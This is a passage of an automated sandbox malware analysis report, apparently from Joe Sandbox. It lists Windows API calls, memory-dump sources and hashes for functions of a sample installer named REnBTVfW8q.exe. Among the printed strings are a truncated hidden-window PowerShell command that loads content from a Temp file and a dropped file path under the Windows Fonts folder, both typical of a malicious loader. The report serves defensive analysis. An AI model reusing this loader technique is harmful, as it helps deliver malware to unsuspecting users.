                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FD
                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 00406153
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406164
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040616B
                                                                                                • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,00438800,80000000,00000003), ref: 00405EA6
                                                                                                • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                              • API String ID: 2171350718-461813615
                                                                                              • Opcode ID: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                                              • Instruction ID: 7a97944e4ecdd21f919348e7cfc29446421eaa6be6f71a8f5a2bdcac5b6ce208
                                                                                              • Opcode Fuzzy Hash: cc1e011b744674eb6045294d1f1ba8016b3cffab7c6b3a5cc0e4edd922729f6b
                                                                                              • Instruction Fuzzy Hash: 953139703007157BC2206B259D49F673A6CEF45714F15003AFA42FA2D2DE7C992586AD
                                                                                              APIs
                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403464,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 004066A7
                                                                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066B6
                                                                                              • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403464,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 004066BB
                                                                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403464,C:\Users\user\AppData\Local\Temp\,75573420,004036D5,?,00000006,00000008,0000000A), ref: 004066CE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: "C:\Users\user\Desktop\REnBTVfW8q.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 589700163-2730985631
                                                                                              • Opcode ID: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                                                              • Instruction ID: 91382b34e261ab6a6b837a41ec70345278d3faa82d58aea2d88f3062b19e38b1
                                                                                              • Opcode Fuzzy Hash: 77b224228f8c57f44dbd024cb25da7c2d773c522f2af8fdd1da9e6af7933f215
                                                                                              • Instruction Fuzzy Hash: 8C11E61580070295DB302B149C40E7766B8EF587A4F12483FED86B32C0E77E4CD286AD
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043C9
                                                                                              • GetSysColor.USER32(00000000), ref: 004043E5
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004043F1
                                                                                              • SetBkMode.GDI32(?,?), ref: 004043FD
                                                                                              • GetSysColor.USER32(?), ref: 00404410
                                                                                              • SetBkColor.GDI32(?,?), ref: 00404420
                                                                                              • DeleteObject.GDI32(?), ref: 0040443A
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404444
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                              • Instruction ID: 701ae6dfa2b2a9365c03cf2c9b1b76f0db24f0feb35c46e7544c905291b2d973
                                                                                              • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                                              • Instruction Fuzzy Hash: 4B216671500704AFCB219F68DE48B5BBBF8AF81714F04893EED95E22A1D774E944CB54
                                                                                              APIs
                                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                                • Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405F99
                                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                              • String ID: 9
                                                                                              • API String ID: 163830602-2366072709
                                                                                              • Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                                              • Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
                                                                                              • Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                                              • Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000,00000000), ref: 00402E8D
                                                                                              • GetTickCount.KERNEL32 ref: 00402EAB
                                                                                              • wsprintfW.USER32 ref: 00402ED9
                                                                                                • Part of subcall function 00405414: lstrlenW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                • Part of subcall function 00405414: lstrcatW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00402EEC,00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000), ref: 0040546F
                                                                                                • Part of subcall function 00405414: SetWindowTextW.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond), ref: 00405481
                                                                                                • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EFD
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402F0B
                                                                                                • Part of subcall function 00402E56: MulDiv.KERNEL32(00072439,00000064,0007684E), ref: 00402E6B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                              • String ID: ... %d%%
                                                                                              • API String ID: 722711167-2449383134
                                                                                              • Opcode ID: b1d83868f06c61a0afcbd0f0ce3e66c9248e0a33da805beecb11655fb503df53
                                                                                              • Instruction ID: c2ec4548d439a14d597b05689786213ff5532ac021c242b5895b0761ec4a5705
                                                                                              • Opcode Fuzzy Hash: b1d83868f06c61a0afcbd0f0ce3e66c9248e0a33da805beecb11655fb503df53
                                                                                              • Instruction Fuzzy Hash: 0501C430440724EBCB31AB60EF4CB9B7B68AB00B44B50417FF945F12E0CAB844558BEE
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404CF9
                                                                                              • GetMessagePos.USER32 ref: 00404D01
                                                                                              • ScreenToClient.USER32(?,?), ref: 00404D1B
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D2D
                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D53
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                              • Instruction ID: b067d4b0ecc7c77c1c3f0caef97ada8ed48413e9bef28a1d47140c0a876cf8aa
                                                                                              • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                              • Instruction Fuzzy Hash: AD015E71A0021DBADB00DB94DD85BFEBBBCAF95715F10412BBA50B62D0C7B899018BA4
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                                              • wsprintfW.USER32 ref: 00402E29
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402E39
                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                              • API String ID: 1451636040-1158693248
                                                                                              • Opcode ID: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                                              • Instruction ID: 0bc749b122006b2f9f6abad3e9991ed6065550717762caf8ffdc158a825a6066
                                                                                              • Opcode Fuzzy Hash: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                                              • Instruction Fuzzy Hash: 69F0367154020DABDF206F50DD4ABEA3B69FB00714F00803AFA06B51D0DBFD55598F99
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                                              • GlobalFree.KERNEL32(?), ref: 00402950
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2667972263-0
                                                                                              • Opcode ID: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                                              • Instruction ID: c824e8dfb1c84b3956194132b72a9c46ff30f807773af65f81dcebc4e122496d
                                                                                              • Opcode Fuzzy Hash: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                                              • Instruction Fuzzy Hash: 6521BFB1800128BBDF216FA5DE49D9E7E79EF09364F10023AF960762E0CB7949418B98
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                                              • wsprintfW.USER32 ref: 00404C7A
                                                                                              • SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                              • String ID: %u.%u%s%s$(7B
                                                                                              • API String ID: 3540041739-1320723960
                                                                                              • Opcode ID: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                                              • Instruction ID: 703546cccce40a16f7c4e0327b319c47dc4604cc2262111db7ea86f65ec4581c
                                                                                              • Opcode Fuzzy Hash: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                                              • Instruction Fuzzy Hash: 0911E7736041287BEB00556DAD46EAF329CDB85374F254237FA66F31D1DA79CC2182E8
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(?,?,formagen\Uninstall\frustulose,000000FF,C:\Windows\Fonts\appendicits.bun,00000400,?,?,00000021), ref: 004025E2
                                                                                              • lstrlenA.KERNEL32(C:\Windows\Fonts\appendicits.bun,?,?,formagen\Uninstall\frustulose,000000FF,C:\Windows\Fonts\appendicits.bun,00000400,?,?,00000021), ref: 004025ED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                              • String ID: C:\Windows\Fonts\appendicits.bun$formagen\Uninstall\frustulose
                                                                                              • API String ID: 3109718747-3392141526
                                                                                              • Opcode ID: aba1ff1e73333e557a2c93527f693b72f8c74919a863be0031e895900c4614b2
                                                                                              • Instruction ID: 778b7e41730bacb68cbd472b7e3a637cf80abcfea8faeb2db308f16ae4ae4a1c
                                                                                              • Opcode Fuzzy Hash: aba1ff1e73333e557a2c93527f693b72f8c74919a863be0031e895900c4614b2
                                                                                              • Instruction Fuzzy Hash: 35112E72A00204BBDB146FB18F8D99F76649F55394F20443BF502F61C1DAFC48425B5E
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405926
                                                                                              • GetLastError.KERNEL32 ref: 0040593A
                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
                                                                                              • GetLastError.KERNEL32 ref: 00405959
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
